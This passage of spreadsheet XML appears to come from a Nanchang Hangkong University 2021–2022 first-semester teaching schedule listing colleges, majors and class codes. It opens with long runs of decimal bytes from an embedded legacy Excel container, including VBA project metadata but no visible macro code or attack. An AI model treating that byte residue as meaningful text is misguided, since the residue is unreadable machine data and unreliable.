50 51 56 48 68 68 66 50 70 66 54 50 70 70 53 48 56 52 51 50 67 67 50 56 50 54 66 49 53 54 66 53 69 50 51 52 50 49 65 50 66 69 51 65 50 56 70 70 50 68 65 66 52 56 56 67 34 13 10 71 67 61 34 69 50 69 48 52 69 55 65 52 53 55 66 52 53 55 66 52 53 34 13 10 13 </t>
  </si>
  <si>
    <t xml:space="preserve">10 91 72 111 115 116 32 69 120 116 101 110 100 101 114 32 73 110 102 111 93 13 10 38 72 48 48 48 48 48 48 48 49 61 123 51 56 51 50 68 54 52 48 45 67 70 57 48 45 49 49 67 70 45 56 69 52 51 45 48 48 65 48 67 57 49 49 48 48 53 65 125 59 86 66 69 59 38 72 48 48 48 48 48 48 48 48 13 10 13 10 91 87 111 114 107 115 112 97 99 101 93 13 10 84 104 105 115 87 111 114 107 98 111 111 107 61 50 50 44 32 50 50 44 32 54 51 54 44 32 52 55 48 44 32 13 10 192 224 49 61 50 50 44 32 50 50 44 32 54 51 54 44 32 52 55 48 44 32 90 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 0 0 5 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 224 133 159 242 249 79 104 16 171 145 8 0 43 39 179 217 48 0 0 0 160 0 0 0 7 0 0 0 1 0 0 0 64 0 0 0 4 0 0 0 72 0 0 0 8 0 0 0 88 0 0 0 18 0 0 0 104 0 0 0 12 0 0 0 128 0 0 0 13 0 0 0 140 0 0 0 19 0 0 0 152 0 0 0 2 0 0 0 168 3 0 0 30 0 0 0 7 0 0 0 68 101 114 114 111 119 0 0 30 0 0 0 5 0 0 0 119 111 114 107 0 119 0 0 30 0 0 0 16 0 0 0 77 105 99 114 111 115 111 102 116 32 69 120 99 101 108 0 64 0 0 0 0 169 7 5 90 77 196 1 64 0 0 0 128 60 181 22 206 106 196 1 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 0 0 5 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 2 213 205 213 156 46 27 16 147 151 8 0 43 44 249 174 48 0 0 0 212 0 0 0 9 0 0 0 1 0 0 0 80 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">5 0 83 0 117 0 109 0 109 0 97 0 114 0 121 0 73 0 110 0 102 0 111 0 114 0 109 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 40 0 2 1 255 255 255 255 17 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 187 0 0 0 208 0 0 0 0 0 0 0 5 0 68 0 111 0 99 0 117 0 109 0 101 0 110 0 116 0 83 0 117 0 109 0 109 0 97 0 114 0 121 0 73 0 110 0 102 0 111 0 114 0 109 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0 0 0 0 0 0 56 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 191 0 0 0 4 1 0 0 0 0 0 0 1 0 67 0 111 0 109 0 112 0 79 0 98 0 106 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 18 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 196 0 0 0 99 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">15 0 0 0 88 0 0 0 23 0 0 0 104 0 0 0 11 0 0 0 112 0 0 0 16 0 0 0 120 0 0 0 19 0 0 0 128 0 0 0 22 0 0 0 136 0 0 0 13 0 0 0 144 0 0 0 12 0 0 0 171 0 0 0 2 0 0 0 168 3 0 0 30 0 0 0 6 0 0 0 97 100 109 105 110 0 111 0 3 0 0 0 123 16 10 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 30 16 0 0 1 0 0 0 15 0 0 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 0 12 16 0 0 2 0 0 0 30 0 0 0 15 0 0 0 69 120 99 101 108 32 52 46 48 32 186 234 177 237 0 3 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 254 255 3 10 0 0 255 255 255 255 32 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 23 0 0 0 77 105 99 114 111 115 111 102 116 32 69 120 99 101 108 32 185 164 215 247 177 237 0 6 0 0 0 66 105 102 102 56 0 14 0 0 0 69 120 99 101 108 46 83 104 101 101 116 46 56 0 244 57 178 113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r>
      <rPr>
        <b val="true"/>
        <sz val="14"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">      南昌航空大学</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2021</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="14"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">～</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2022</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="14"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">学年第一学期教学进程表</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">年　　级</t>
  </si>
  <si>
    <t xml:space="preserve">学院号</t>
  </si>
  <si>
    <t xml:space="preserve">学院名称</t>
  </si>
  <si>
    <t xml:space="preserve">专业号</t>
  </si>
  <si>
    <t xml:space="preserve">专业</t>
  </si>
  <si>
    <t xml:space="preserve">                         年</t>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">2022</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">                         月    </t>
  </si>
  <si>
    <t xml:space="preserve">九</t>
  </si>
  <si>
    <t xml:space="preserve">十</t>
  </si>
  <si>
    <t xml:space="preserve">十一</t>
  </si>
  <si>
    <t xml:space="preserve">十二</t>
  </si>
  <si>
    <t xml:space="preserve">一</t>
  </si>
  <si>
    <t xml:space="preserve">一、二</t>
  </si>
  <si>
    <t xml:space="preserve">    </t>
  </si>
  <si>
    <t xml:space="preserve">寒 假</t>
  </si>
  <si>
    <t xml:space="preserve">                         日</t>
  </si>
  <si>
    <t xml:space="preserve">│</t>
  </si>
  <si>
    <t xml:space="preserve"> 班                   周</t>
  </si>
  <si>
    <t xml:space="preserve">1.17~2.20</t>
  </si>
  <si>
    <t xml:space="preserve">                 级</t>
  </si>
  <si>
    <t xml:space="preserve">2018</t>
  </si>
  <si>
    <t xml:space="preserve">1</t>
  </si>
  <si>
    <t xml:space="preserve">材料科学与工程学院</t>
  </si>
  <si>
    <t xml:space="preserve">205</t>
  </si>
  <si>
    <t xml:space="preserve">无机非金属材料工程</t>
  </si>
  <si>
    <t xml:space="preserve">180111</t>
  </si>
  <si>
    <t xml:space="preserve">∈</t>
  </si>
  <si>
    <t xml:space="preserve">∷</t>
  </si>
  <si>
    <t xml:space="preserve">180112</t>
  </si>
  <si>
    <t xml:space="preserve">8DF74B02DD8F40EE856FE05309F398B6</t>
  </si>
  <si>
    <t xml:space="preserve">金属材料工程（金属材料及热处理方向）</t>
  </si>
  <si>
    <t xml:space="preserve">180121</t>
  </si>
  <si>
    <t xml:space="preserve">180122</t>
  </si>
  <si>
    <t xml:space="preserve">180123</t>
  </si>
  <si>
    <t xml:space="preserve">81AC45A5D60B4CC3A4152318C4DF3DCF</t>
  </si>
  <si>
    <t xml:space="preserve">金属材料工程（腐蚀与防护方向）</t>
  </si>
  <si>
    <t xml:space="preserve">180124</t>
  </si>
  <si>
    <t xml:space="preserve">180125</t>
  </si>
  <si>
    <t xml:space="preserve">180126</t>
  </si>
  <si>
    <t xml:space="preserve">180127</t>
  </si>
  <si>
    <t xml:space="preserve">225</t>
  </si>
  <si>
    <t xml:space="preserve">金属材料工程（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180128</t>
  </si>
  <si>
    <t xml:space="preserve">9</t>
  </si>
  <si>
    <t xml:space="preserve">高分子材料与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180131</t>
  </si>
  <si>
    <t xml:space="preserve">※</t>
  </si>
  <si>
    <t xml:space="preserve">///</t>
  </si>
  <si>
    <t xml:space="preserve">180132</t>
  </si>
  <si>
    <t xml:space="preserve">180133</t>
  </si>
  <si>
    <t xml:space="preserve">234</t>
  </si>
  <si>
    <t xml:space="preserve">复合材料与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180141</t>
  </si>
  <si>
    <t xml:space="preserve">180142</t>
  </si>
  <si>
    <t xml:space="preserve">2019</t>
  </si>
  <si>
    <t xml:space="preserve">190111</t>
  </si>
  <si>
    <t xml:space="preserve">Z</t>
  </si>
  <si>
    <t xml:space="preserve">－</t>
  </si>
  <si>
    <t xml:space="preserve">190112</t>
  </si>
  <si>
    <t xml:space="preserve">190121</t>
  </si>
  <si>
    <t xml:space="preserve">190122</t>
  </si>
  <si>
    <t xml:space="preserve">190123</t>
  </si>
  <si>
    <t xml:space="preserve">190124</t>
  </si>
  <si>
    <t xml:space="preserve">190125</t>
  </si>
  <si>
    <t xml:space="preserve">190126</t>
  </si>
  <si>
    <t xml:space="preserve">190127</t>
  </si>
  <si>
    <t xml:space="preserve">190128</t>
  </si>
  <si>
    <t xml:space="preserve">190131</t>
  </si>
  <si>
    <t xml:space="preserve">190132</t>
  </si>
  <si>
    <t xml:space="preserve">190133</t>
  </si>
  <si>
    <t xml:space="preserve">190141</t>
  </si>
  <si>
    <t xml:space="preserve">190142</t>
  </si>
  <si>
    <t xml:space="preserve">2020</t>
  </si>
  <si>
    <t xml:space="preserve">200111</t>
  </si>
  <si>
    <t xml:space="preserve">200112</t>
  </si>
  <si>
    <t xml:space="preserve">200121</t>
  </si>
  <si>
    <t xml:space="preserve">200122</t>
  </si>
  <si>
    <t xml:space="preserve">200123</t>
  </si>
  <si>
    <t xml:space="preserve">200124</t>
  </si>
  <si>
    <t xml:space="preserve">200125</t>
  </si>
  <si>
    <t xml:space="preserve">200126</t>
  </si>
  <si>
    <t xml:space="preserve">200127</t>
  </si>
  <si>
    <t xml:space="preserve">200131</t>
  </si>
  <si>
    <t xml:space="preserve">200132</t>
  </si>
  <si>
    <t xml:space="preserve">200133</t>
  </si>
  <si>
    <t xml:space="preserve">200141</t>
  </si>
  <si>
    <t xml:space="preserve">200142</t>
  </si>
  <si>
    <t xml:space="preserve">2021</t>
  </si>
  <si>
    <t xml:space="preserve">210111</t>
  </si>
  <si>
    <t xml:space="preserve">210112</t>
  </si>
  <si>
    <t xml:space="preserve">210121</t>
  </si>
  <si>
    <t xml:space="preserve">210122</t>
  </si>
  <si>
    <t xml:space="preserve">210123</t>
  </si>
  <si>
    <t xml:space="preserve">210124</t>
  </si>
  <si>
    <t xml:space="preserve">210125</t>
  </si>
  <si>
    <t xml:space="preserve">210126</t>
  </si>
  <si>
    <t xml:space="preserve">210127</t>
  </si>
  <si>
    <t xml:space="preserve">210131</t>
  </si>
  <si>
    <t xml:space="preserve">210132</t>
  </si>
  <si>
    <t xml:space="preserve">210133</t>
  </si>
  <si>
    <t xml:space="preserve">210141</t>
  </si>
  <si>
    <t xml:space="preserve">210142</t>
  </si>
  <si>
    <t xml:space="preserve">2</t>
  </si>
  <si>
    <t xml:space="preserve">环境与化学工程学院</t>
  </si>
  <si>
    <t xml:space="preserve">11</t>
  </si>
  <si>
    <t xml:space="preserve">应用化学</t>
  </si>
  <si>
    <t xml:space="preserve">180211</t>
  </si>
  <si>
    <t xml:space="preserve">180212</t>
  </si>
  <si>
    <t xml:space="preserve">180213</t>
  </si>
  <si>
    <t xml:space="preserve">12</t>
  </si>
  <si>
    <t xml:space="preserve">环境工程</t>
  </si>
  <si>
    <t xml:space="preserve">180221</t>
  </si>
  <si>
    <t xml:space="preserve">180222</t>
  </si>
  <si>
    <t xml:space="preserve">222</t>
  </si>
  <si>
    <t xml:space="preserve">环境工程（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180223</t>
  </si>
  <si>
    <t xml:space="preserve">⊙</t>
  </si>
  <si>
    <t xml:space="preserve">#</t>
  </si>
  <si>
    <t xml:space="preserve">13</t>
  </si>
  <si>
    <t xml:space="preserve">材料化学</t>
  </si>
  <si>
    <t xml:space="preserve">180231</t>
  </si>
  <si>
    <t xml:space="preserve">180232</t>
  </si>
  <si>
    <t xml:space="preserve">180233</t>
  </si>
  <si>
    <t xml:space="preserve">126</t>
  </si>
  <si>
    <t xml:space="preserve">给排水科学与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180241</t>
  </si>
  <si>
    <t xml:space="preserve">180242</t>
  </si>
  <si>
    <t xml:space="preserve">190211</t>
  </si>
  <si>
    <t xml:space="preserve">〓</t>
  </si>
  <si>
    <t xml:space="preserve">190212</t>
  </si>
  <si>
    <t xml:space="preserve">190213</t>
  </si>
  <si>
    <t xml:space="preserve">190221</t>
  </si>
  <si>
    <t xml:space="preserve">190222</t>
  </si>
  <si>
    <t xml:space="preserve">190223</t>
  </si>
  <si>
    <t xml:space="preserve">190231</t>
  </si>
  <si>
    <t xml:space="preserve">Ω</t>
  </si>
  <si>
    <t xml:space="preserve">190232</t>
  </si>
  <si>
    <t xml:space="preserve">190233</t>
  </si>
  <si>
    <t xml:space="preserve">190241</t>
  </si>
  <si>
    <t xml:space="preserve">190242</t>
  </si>
  <si>
    <t xml:space="preserve">200211</t>
  </si>
  <si>
    <t xml:space="preserve">200212</t>
  </si>
  <si>
    <t xml:space="preserve">200213</t>
  </si>
  <si>
    <t xml:space="preserve">200221</t>
  </si>
  <si>
    <t xml:space="preserve">G</t>
  </si>
  <si>
    <t xml:space="preserve">200222</t>
  </si>
  <si>
    <t xml:space="preserve">200223</t>
  </si>
  <si>
    <t xml:space="preserve">200231</t>
  </si>
  <si>
    <t xml:space="preserve">200232</t>
  </si>
  <si>
    <t xml:space="preserve">200233</t>
  </si>
  <si>
    <t xml:space="preserve">200241</t>
  </si>
  <si>
    <t xml:space="preserve">200242</t>
  </si>
  <si>
    <t xml:space="preserve">210211</t>
  </si>
  <si>
    <t xml:space="preserve">210212</t>
  </si>
  <si>
    <t xml:space="preserve">210213</t>
  </si>
  <si>
    <t xml:space="preserve">210221</t>
  </si>
  <si>
    <t xml:space="preserve">210222</t>
  </si>
  <si>
    <t xml:space="preserve">210223</t>
  </si>
  <si>
    <t xml:space="preserve">210224</t>
  </si>
  <si>
    <t xml:space="preserve">210231</t>
  </si>
  <si>
    <t xml:space="preserve">210232</t>
  </si>
  <si>
    <t xml:space="preserve">210233</t>
  </si>
  <si>
    <t xml:space="preserve">210241</t>
  </si>
  <si>
    <t xml:space="preserve">210242</t>
  </si>
  <si>
    <t xml:space="preserve">3</t>
  </si>
  <si>
    <t xml:space="preserve">航空制造工程学院</t>
  </si>
  <si>
    <t xml:space="preserve">188</t>
  </si>
  <si>
    <t xml:space="preserve">材料加工类专业（春晓班）</t>
  </si>
  <si>
    <t xml:space="preserve">180301</t>
  </si>
  <si>
    <t xml:space="preserve">6D2EDBB693474C87B37C23E7D7419497</t>
  </si>
  <si>
    <t xml:space="preserve">机械制造类专业（春晓班）</t>
  </si>
  <si>
    <t xml:space="preserve">180302</t>
  </si>
  <si>
    <t xml:space="preserve">14</t>
  </si>
  <si>
    <t xml:space="preserve">机械设计制造及其自动化</t>
  </si>
  <si>
    <t xml:space="preserve">180311</t>
  </si>
  <si>
    <t xml:space="preserve">180312</t>
  </si>
  <si>
    <t xml:space="preserve">180313</t>
  </si>
  <si>
    <t xml:space="preserve">180314</t>
  </si>
  <si>
    <t xml:space="preserve">16</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器制造工程</t>
  </si>
  <si>
    <t xml:space="preserve">180321</t>
  </si>
  <si>
    <t xml:space="preserve">180322</t>
  </si>
  <si>
    <t xml:space="preserve">180323</t>
  </si>
  <si>
    <t xml:space="preserve">材料成型及控制工程</t>
  </si>
  <si>
    <t xml:space="preserve">180331</t>
  </si>
  <si>
    <t xml:space="preserve">M</t>
  </si>
  <si>
    <t xml:space="preserve">180332</t>
  </si>
  <si>
    <t xml:space="preserve">180333</t>
  </si>
  <si>
    <t xml:space="preserve">180334</t>
  </si>
  <si>
    <t xml:space="preserve">180335</t>
  </si>
  <si>
    <t xml:space="preserve">180336</t>
  </si>
  <si>
    <t xml:space="preserve">235</t>
  </si>
  <si>
    <t xml:space="preserve">材料成型及控制工程（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180337</t>
  </si>
  <si>
    <t xml:space="preserve">180338</t>
  </si>
  <si>
    <t xml:space="preserve">10</t>
  </si>
  <si>
    <t xml:space="preserve">焊接技术与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180341</t>
  </si>
  <si>
    <t xml:space="preserve">180342</t>
  </si>
  <si>
    <t xml:space="preserve">180343</t>
  </si>
  <si>
    <t xml:space="preserve">223</t>
  </si>
  <si>
    <t xml:space="preserve">焊接技术与工程（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180344</t>
  </si>
  <si>
    <t xml:space="preserve">02F0556D0DB943DCB3CAA65090D8441F</t>
  </si>
  <si>
    <t xml:space="preserve">电子封装技术</t>
  </si>
  <si>
    <t xml:space="preserve">180351</t>
  </si>
  <si>
    <t xml:space="preserve">C8467FA5031D4C639D57FC5FD46B1BCF</t>
  </si>
  <si>
    <t xml:space="preserve">机械电子工程</t>
  </si>
  <si>
    <t xml:space="preserve">180361</t>
  </si>
  <si>
    <t xml:space="preserve">★</t>
  </si>
  <si>
    <t xml:space="preserve">180362</t>
  </si>
  <si>
    <t xml:space="preserve">190301</t>
  </si>
  <si>
    <t xml:space="preserve">190302</t>
  </si>
  <si>
    <t xml:space="preserve">190311</t>
  </si>
  <si>
    <t xml:space="preserve">190312</t>
  </si>
  <si>
    <t xml:space="preserve">190313</t>
  </si>
  <si>
    <t xml:space="preserve">190314</t>
  </si>
  <si>
    <t xml:space="preserve">190321</t>
  </si>
  <si>
    <t xml:space="preserve">190322</t>
  </si>
  <si>
    <t xml:space="preserve">190323</t>
  </si>
  <si>
    <t xml:space="preserve">190331</t>
  </si>
  <si>
    <t xml:space="preserve">190332</t>
  </si>
  <si>
    <t xml:space="preserve">190333</t>
  </si>
  <si>
    <t xml:space="preserve">190334</t>
  </si>
  <si>
    <t xml:space="preserve">190335</t>
  </si>
  <si>
    <t xml:space="preserve">190336</t>
  </si>
  <si>
    <t xml:space="preserve">190337</t>
  </si>
  <si>
    <t xml:space="preserve">190338</t>
  </si>
  <si>
    <t xml:space="preserve">190341</t>
  </si>
  <si>
    <t xml:space="preserve">190342</t>
  </si>
  <si>
    <t xml:space="preserve">190343</t>
  </si>
  <si>
    <t xml:space="preserve">190344</t>
  </si>
  <si>
    <t xml:space="preserve">190351</t>
  </si>
  <si>
    <t xml:space="preserve">190361</t>
  </si>
  <si>
    <t xml:space="preserve">190362</t>
  </si>
  <si>
    <t xml:space="preserve">200301</t>
  </si>
  <si>
    <t xml:space="preserve">200302</t>
  </si>
  <si>
    <t xml:space="preserve">200311</t>
  </si>
  <si>
    <t xml:space="preserve">200312</t>
  </si>
  <si>
    <t xml:space="preserve">200321</t>
  </si>
  <si>
    <t xml:space="preserve">200322</t>
  </si>
  <si>
    <t xml:space="preserve">200323</t>
  </si>
  <si>
    <t xml:space="preserve">200331</t>
  </si>
  <si>
    <t xml:space="preserve">200332</t>
  </si>
  <si>
    <t xml:space="preserve">200333</t>
  </si>
  <si>
    <t xml:space="preserve">200334</t>
  </si>
  <si>
    <t xml:space="preserve">200335</t>
  </si>
  <si>
    <t xml:space="preserve">200336</t>
  </si>
  <si>
    <t xml:space="preserve">200341</t>
  </si>
  <si>
    <t xml:space="preserve">200342</t>
  </si>
  <si>
    <t xml:space="preserve">200343</t>
  </si>
  <si>
    <t xml:space="preserve">200344</t>
  </si>
  <si>
    <t xml:space="preserve">200351</t>
  </si>
  <si>
    <t xml:space="preserve">B</t>
  </si>
  <si>
    <t xml:space="preserve">200361</t>
  </si>
  <si>
    <t xml:space="preserve">200362</t>
  </si>
  <si>
    <t xml:space="preserve">D333E2DE35F24BE9BD6233160DB5C21B</t>
  </si>
  <si>
    <t xml:space="preserve">智能制造工程</t>
  </si>
  <si>
    <t xml:space="preserve">200371</t>
  </si>
  <si>
    <t xml:space="preserve">200372</t>
  </si>
  <si>
    <t xml:space="preserve">210301</t>
  </si>
  <si>
    <t xml:space="preserve">210302</t>
  </si>
  <si>
    <t xml:space="preserve">210311</t>
  </si>
  <si>
    <t xml:space="preserve">210312</t>
  </si>
  <si>
    <t xml:space="preserve">210321</t>
  </si>
  <si>
    <t xml:space="preserve">210322</t>
  </si>
  <si>
    <t xml:space="preserve">210323</t>
  </si>
  <si>
    <t xml:space="preserve">210331</t>
  </si>
  <si>
    <t xml:space="preserve">210332</t>
  </si>
  <si>
    <t xml:space="preserve">210333</t>
  </si>
  <si>
    <t xml:space="preserve">210334</t>
  </si>
  <si>
    <t xml:space="preserve">210335</t>
  </si>
  <si>
    <t xml:space="preserve">210336</t>
  </si>
  <si>
    <t xml:space="preserve">210341</t>
  </si>
  <si>
    <t xml:space="preserve">210342</t>
  </si>
  <si>
    <t xml:space="preserve">210351</t>
  </si>
  <si>
    <t xml:space="preserve">210361</t>
  </si>
  <si>
    <t xml:space="preserve">210362</t>
  </si>
  <si>
    <t xml:space="preserve">210371</t>
  </si>
  <si>
    <t xml:space="preserve">210372</t>
  </si>
  <si>
    <t xml:space="preserve">4</t>
  </si>
  <si>
    <t xml:space="preserve">信息工程学院</t>
  </si>
  <si>
    <t xml:space="preserve">19</t>
  </si>
  <si>
    <t xml:space="preserve">电子信息工程</t>
  </si>
  <si>
    <t xml:space="preserve">180411</t>
  </si>
  <si>
    <t xml:space="preserve">180412</t>
  </si>
  <si>
    <t xml:space="preserve">180413</t>
  </si>
  <si>
    <t xml:space="preserve">180414</t>
  </si>
  <si>
    <t xml:space="preserve">180415</t>
  </si>
  <si>
    <t xml:space="preserve">22</t>
  </si>
  <si>
    <t xml:space="preserve">通信工程</t>
  </si>
  <si>
    <t xml:space="preserve">180421</t>
  </si>
  <si>
    <t xml:space="preserve">180422</t>
  </si>
  <si>
    <t xml:space="preserve">180423</t>
  </si>
  <si>
    <t xml:space="preserve">139</t>
  </si>
  <si>
    <t xml:space="preserve">电子信息科学与技术</t>
  </si>
  <si>
    <t xml:space="preserve">180431</t>
  </si>
  <si>
    <t xml:space="preserve">180432</t>
  </si>
  <si>
    <t xml:space="preserve">34</t>
  </si>
  <si>
    <t xml:space="preserve">自动化</t>
  </si>
  <si>
    <t xml:space="preserve">180441</t>
  </si>
  <si>
    <t xml:space="preserve">180442</t>
  </si>
  <si>
    <t xml:space="preserve">180443</t>
  </si>
  <si>
    <t xml:space="preserve">5CAA9BAD81954F8696895F0CB4031963</t>
  </si>
  <si>
    <t xml:space="preserve">自动化（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180444</t>
  </si>
  <si>
    <t xml:space="preserve">28</t>
  </si>
  <si>
    <t xml:space="preserve">计算机科学与技术</t>
  </si>
  <si>
    <t xml:space="preserve">180451</t>
  </si>
  <si>
    <t xml:space="preserve">180452</t>
  </si>
  <si>
    <t xml:space="preserve">27</t>
  </si>
  <si>
    <t xml:space="preserve">网络工程</t>
  </si>
  <si>
    <t xml:space="preserve">180461</t>
  </si>
  <si>
    <t xml:space="preserve">180462</t>
  </si>
  <si>
    <t xml:space="preserve">49</t>
  </si>
  <si>
    <t xml:space="preserve">教育技术学</t>
  </si>
  <si>
    <t xml:space="preserve">180471</t>
  </si>
  <si>
    <t xml:space="preserve">216</t>
  </si>
  <si>
    <t xml:space="preserve">电气工程及其自动化</t>
  </si>
  <si>
    <t xml:space="preserve">180481</t>
  </si>
  <si>
    <t xml:space="preserve">180482</t>
  </si>
  <si>
    <t xml:space="preserve">190411</t>
  </si>
  <si>
    <t xml:space="preserve">◎</t>
  </si>
  <si>
    <t xml:space="preserve">190412</t>
  </si>
  <si>
    <t xml:space="preserve">190413</t>
  </si>
  <si>
    <t xml:space="preserve">190414</t>
  </si>
  <si>
    <t xml:space="preserve">190415</t>
  </si>
  <si>
    <t xml:space="preserve">190421</t>
  </si>
  <si>
    <t xml:space="preserve">190422</t>
  </si>
  <si>
    <t xml:space="preserve">190423</t>
  </si>
  <si>
    <t xml:space="preserve">190431</t>
  </si>
  <si>
    <t xml:space="preserve">190432</t>
  </si>
  <si>
    <t xml:space="preserve">190441</t>
  </si>
  <si>
    <t xml:space="preserve">190442</t>
  </si>
  <si>
    <t xml:space="preserve">190443</t>
  </si>
  <si>
    <t xml:space="preserve">190444</t>
  </si>
  <si>
    <t xml:space="preserve">190451</t>
  </si>
  <si>
    <t xml:space="preserve">190452</t>
  </si>
  <si>
    <t xml:space="preserve">190461</t>
  </si>
  <si>
    <t xml:space="preserve">190462</t>
  </si>
  <si>
    <t xml:space="preserve">190471</t>
  </si>
  <si>
    <t xml:space="preserve">190481</t>
  </si>
  <si>
    <t xml:space="preserve">190482</t>
  </si>
  <si>
    <t xml:space="preserve">200411</t>
  </si>
  <si>
    <t xml:space="preserve">200412</t>
  </si>
  <si>
    <t xml:space="preserve">200413</t>
  </si>
  <si>
    <t xml:space="preserve">200414</t>
  </si>
  <si>
    <t xml:space="preserve">200415</t>
  </si>
  <si>
    <t xml:space="preserve">200416</t>
  </si>
  <si>
    <t xml:space="preserve">200421</t>
  </si>
  <si>
    <t xml:space="preserve">200422</t>
  </si>
  <si>
    <t xml:space="preserve">200423</t>
  </si>
  <si>
    <t xml:space="preserve">200441</t>
  </si>
  <si>
    <t xml:space="preserve">200442</t>
  </si>
  <si>
    <t xml:space="preserve">200443</t>
  </si>
  <si>
    <t xml:space="preserve">200451</t>
  </si>
  <si>
    <t xml:space="preserve">200452</t>
  </si>
  <si>
    <t xml:space="preserve">200453</t>
  </si>
  <si>
    <t xml:space="preserve">200461</t>
  </si>
  <si>
    <t xml:space="preserve">200462</t>
  </si>
  <si>
    <t xml:space="preserve">200481</t>
  </si>
  <si>
    <t xml:space="preserve">200482</t>
  </si>
  <si>
    <t xml:space="preserve">DC332892A7544E70970375C022201E6C</t>
  </si>
  <si>
    <t xml:space="preserve">人工智能</t>
  </si>
  <si>
    <t xml:space="preserve">200491</t>
  </si>
  <si>
    <t xml:space="preserve">210411</t>
  </si>
  <si>
    <t xml:space="preserve">210412</t>
  </si>
  <si>
    <t xml:space="preserve">210413</t>
  </si>
  <si>
    <t xml:space="preserve">210414</t>
  </si>
  <si>
    <t xml:space="preserve">210415</t>
  </si>
  <si>
    <t xml:space="preserve">210416</t>
  </si>
  <si>
    <t xml:space="preserve">210421</t>
  </si>
  <si>
    <t xml:space="preserve">210422</t>
  </si>
  <si>
    <t xml:space="preserve">210423</t>
  </si>
  <si>
    <t xml:space="preserve">210441</t>
  </si>
  <si>
    <t xml:space="preserve">210442</t>
  </si>
  <si>
    <t xml:space="preserve">210443</t>
  </si>
  <si>
    <t xml:space="preserve">210451</t>
  </si>
  <si>
    <t xml:space="preserve">210452</t>
  </si>
  <si>
    <t xml:space="preserve">210453</t>
  </si>
  <si>
    <t xml:space="preserve">210461</t>
  </si>
  <si>
    <t xml:space="preserve">210462</t>
  </si>
  <si>
    <t xml:space="preserve">210481</t>
  </si>
  <si>
    <t xml:space="preserve">210482</t>
  </si>
  <si>
    <t xml:space="preserve">210491</t>
  </si>
  <si>
    <t xml:space="preserve">210492</t>
  </si>
  <si>
    <t xml:space="preserve">5</t>
  </si>
  <si>
    <t xml:space="preserve">外国语学院</t>
  </si>
  <si>
    <t xml:space="preserve">25</t>
  </si>
  <si>
    <t xml:space="preserve">英语</t>
  </si>
  <si>
    <t xml:space="preserve">180511</t>
  </si>
  <si>
